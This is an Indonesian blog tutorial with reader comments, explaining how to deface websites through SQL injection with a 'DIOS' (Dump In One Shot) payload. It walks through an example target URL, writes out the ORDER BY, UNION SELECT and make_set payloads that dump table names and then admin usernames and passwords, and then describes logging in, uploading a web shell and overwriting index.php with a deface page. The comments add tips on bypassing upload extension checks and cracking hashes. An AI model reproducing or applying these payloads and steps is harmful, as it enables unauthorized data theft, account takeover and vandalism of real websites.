Cara Deface SQLI dengan DIOS (Dump In One Shot)
Oke setelah kemarin bahas artikel tentang Cara Deface Dengan Sql Injection Manual pada kali ini gw bakalan mau share artikel tentang Cara Deface SQLI dengan DIOS (Dump In One Shot).
Kalo di artikel kemarin kita harus masukin union select kita mesti harus memasukan group_concat dan seterusnya untuk mengetahui column dan table.
Kalo kali ini ga perlu repot-repot lagi, karena disimi gw mengunakan DIOS nanti bakalan muncul semua column dan tablenya.
Sekarang, kita langsung saja ketutorialnya.
Disini gw udah dapet target, kalo kalian belom punya dork buat dapet website vuln sqli kalian bisa baca dibawah ini.
Ini contoh target gw,
www.situs.co.il/advertiser_view.php?id=77
Lanjut kita bermain dengan order+by+1-- dan seterusnya sampai menemukan pesan error.
Disini w mendapatkan errornya di angka order+by+10-- berarti jumlah columnnya ada 9.
Ditarget gw ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bagian bawah about.(lihat gambar diatas)
Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya seperti ini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--
Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Untuk perintah lengkapnya kek gini gaes,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--
Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.
Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini target gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,
Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.
Setelah itu tinggal cari tempat admin loginya, tapi disini gw udah tau tempat admin loginya jadi tinggal login.
Sekarang cari tempat buat upload shell, lihat gambar dibawah ini,
Setelah menemukan tempat buat upload shell, sekarang saatnya upload shell kalian.
Kalo belum punya shell kalian bisa cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,
Untuk cara mengaksesnya shellnya kalian tinggal klik kanan lalu copy url dibrowser,
Untuk diandroid tinggal klik dan tahan pada shell kalian yang udah diupload tadi lalu salin url gambar,
Sekarang tinggal paste url shell tadi dibrowser dan enter, nanti shell kalian bakalan muncul.
Nah step terakhir, cari directory publick_html dan upload script deface kalian disitu dengan extensi index.php ini untuk ngedeface halaman utama website.
Kalo hanya mau nitip file saja, kalian upload script deface selain index.php bisa dengan nama test.php, test.html, dll sesuai keinginan kalian aja.
Oke sekian dulu artikel kali ini, semoga bermanfaat.
Shell format .jpg dong gan
ReplyDeleteBypass ext aja kalo gabisa atau pake tamper data.
DeleteThis comment has been removed by a blog administrator.
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDeleteBang Hash Admin Nya Di Web Mna?
ReplyDeleteOh soal itu, bisa kamu cari artikel di blog ini gan, soalnya saya juga sudah membahas hal itu.
DeleteYang ini judulnya, Kumpulan Situs Tempat Hash Password Lookup/Cracking Online
This comment has been removed by a blog administrator.
ReplyDelete